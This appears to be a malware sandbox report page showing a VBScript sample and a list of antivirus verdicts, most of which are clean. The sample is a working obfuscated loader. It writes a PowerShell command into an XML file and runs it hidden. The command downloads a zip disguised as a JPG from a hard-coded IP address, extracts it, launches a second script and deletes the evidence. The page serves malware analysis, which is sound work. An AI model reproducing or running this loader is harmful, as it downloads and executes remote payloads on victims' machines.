Static | ZeroBOX
No static analysis available.
Set VGUWPOJLFMWTYRTX = WScript.CreateObject("WScript.Shell")
NGUJSMTJGVQCSIKS = "<command>" & _
" <a>" & _
" <execute>Start-BitsTransfer -Source ""http://185.81.157.248:222/mc.jpg"" -Destination ""C:\Users\Public\doxido.zip""; Expand-Archive -Path ""C:\Users\Public\doxido.zip"" -DestinationPath ""C:\Users\Public\"" -Force; Start ""C:\Users\Public\WebDoxcentral.vbs""; Remove-Item -Path ""C:\Users\Public\doxido.zip"" -Force</execute>" & _
" </a>" & _
"</command>"
Set REZKVEMKICMKKXEC = CreateObject("Scripting.FileSystemObject")
Set NCVEGXBROKMVSAQO = REZKVEMKICMKKXEC.CreateTextFile("C:\Users\Public\SofrwareFrameWork.xml", True)
NCVEGXBROKMVSAQO.Write NGUJSMTJGVQCSIKS
NCVEGXBROKMVSAQO.Close
VGUWPOJLFMWTYRTX.Run "powershell -command ""[xml]$xmldoc = Get-Content 'C:\Users\Public\SofrwareFrameWork.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command""", 0, True
REZKVEMKICMKKXEC.DeleteFile "C:\Users\Public\SofrwareFrameWork.xml"
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
BitDefenderTheta Clean
VirIT Clean
Symantec ISB.Downloader!gen48
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Agent.gen
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Rising Clean
Sophos Clean
Baidu Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
CMC Clean
Emsisoft Clean
Ikarus Clean
Jiangmin Clean
Varist Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Microsoft Clean
ViRobot Clean
ZoneAlarm HEUR:Trojan.Script.Agent.gen
GData Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.